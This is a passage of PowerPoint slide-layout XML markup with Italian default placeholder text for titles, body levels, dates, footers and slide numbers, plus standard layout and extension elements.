            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23395818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7" name="Connettore 1 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4EA097C-E512-4995-98A8-63A826DF1C3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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29" name="Titolo 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="5410200"/>
            <a:ext cx="11480800" cy="882650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Segnaposto testo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25" name="Segnaposto testo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a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto contenuto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28" name="Segnaposto contenuto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8" name="Segnaposto data 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7902507F-977E-4D53-8585-1EB06739AD17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E091B111-9DA8-47B3-98CD-4ABD0CB58090}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto piè di pagina 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F3B601-186B-4177-B7F6-4D6C78B3CA03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto numero diapositiva 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7214FDD3-8620-41B3-ACAA-86D52D01A214}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="6477000"/>
            <a:ext cx="1016000" cy="247650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F6C90CB6-6163-497D-816C-06839BD9D995}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317175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30" name="Titolo 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402336" y="457200"/>
            <a:ext cx="11582400" cy="841248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29DE614A-27A9-47AB-A2A9-B39AD503A7F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E2A2B4D4-161E-4BCA-A64A-4B52D7018B66}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{197B1D94-43E6-48D8-BCE4-4F8F9BC4F6BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008D36FC-A230-45EF-8515-0F0E330B8CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{29BA9E6B-04EB-42B3-9D7A-13F4ED344A4E}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3081931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Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33106E72-2912-459A-A898-21DCD80C1C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0BD97EAA-EAC6-4F59-9ABE-CAEBBF698AA8}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto piè di pagina 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B5712D6-DA0D-4A0E-AC7A-9DAACC02175A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto numero diapositiva 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8615737-CA3A-4B44-901B-6752539A52A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{99A089DB-3F2F-4914-9A2F-F35BA3997AA5}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2727648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5" name="Connettore 1 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56A801B4-C40E-49C8-8459-CDFA0EBBAD5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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2" name="Titolo 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5486400"/>
            <a:ext cx="11277600" cy="520700"/>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a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Segnaposto contenuto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data 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{926C386E-158B-4AE8-A82D-5C25D1CB5FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1886F329-870B-4B5D-97EB-C8CDB2761707}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto piè di pagina 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E05ADE4-C4B8-4AD6-89B4-4865120A390D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Segnaposto numero diapositiva 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388DA111-AF6D-40A1-AF71-C8D16696C120}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{8701AACC-EB36-4B62-B4CD-30594CCCDA74}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15854415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13" name="Segnaposto immagine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normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT" noProof="0"/>
              <a:t>Fare clic sull'icona per inserire un'immagine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titolo 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508000" y="4993760"/>
            <a:ext cx="7823200" cy="522288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="2000" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Segnaposto testo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a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto data 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B9B25CE-6AD3-4427-BEB2-1E1A1B6AFCFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D5413064-6FD7-4880-BF79-0931E710810B}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5E2557-2929-4BAA-80BA-1585DB7C4162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Segnaposto numero diapositiva 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072994A5-B686-4D16-AF97-A31400F4F729}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3D5C4C60-3AF5-497E-B07E-D11D2494E5E0}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426459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3.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7" name="Connettore 1 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C2477C6-2873-471B-A3ED-416C060C71F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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029" name="Segnaposto testo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B094B78-E2FF-4E69-A962-3B99CBB025B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="1554163"/>
            <a:ext cx="115824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it-IT" altLang="it-IT"/>
              <a:t>Fare clic per modificare stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>Quinto livello</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Segnaposto data 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51E6DCA3-C9AC-4643-A99C-A9C0D2531FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6FF94044-3E8A-4555-B3B7-78E08C4CEE21}" type="datetimeFigureOut">
              <a:rPr lang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>20/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Segnaposto piè di pagina 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93B2F7CC-2ECC-4F56-96C5-CFF688A02975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto numero diapositiva 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4CE646-831D-40A0-BB6C-EC8520FED202}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="6477001"/>
            <a:ext cx="1016000" cy="244475"/>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solidFill>
                  <a:srgbClr val="D38E27"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7611F27A-3FDD-49BE-8595-AF0C1A6805A8}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Segnaposto titolo 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD6C3BC-D83B-484F-B385-AF0A07A86026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="457200"/>
            <a:ext cx="11582400" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Connettore 1 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{157BDA8C-CAEE-41CC-ACAD-5162ABBEA3CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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
        <p:nvSpPr>
          <p:cNvPr id="12" name="Connettore 1 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D3E4DB-CF7C-43DD-8719-6C800E994425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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56" r:id="rId4"/>
    <p:sldLayoutId id="2147483762" r:id="rId5"/>
    <p:sldLayoutId id="2147483757" r:id="rId6"/>
    <p:sldLayoutId id="2147483763" r:id="rId7"/>
    <p:sldLayoutId id="2147483764" r:id="rId8"/>
    <p:sldLayoutId id="2147483765" r:id="rId9"/>
    <p:sldLayoutId id="2147483758" r:id="rId10"/>
    <p:sldLayoutId id="2147483766" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:title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p:titleStyle>
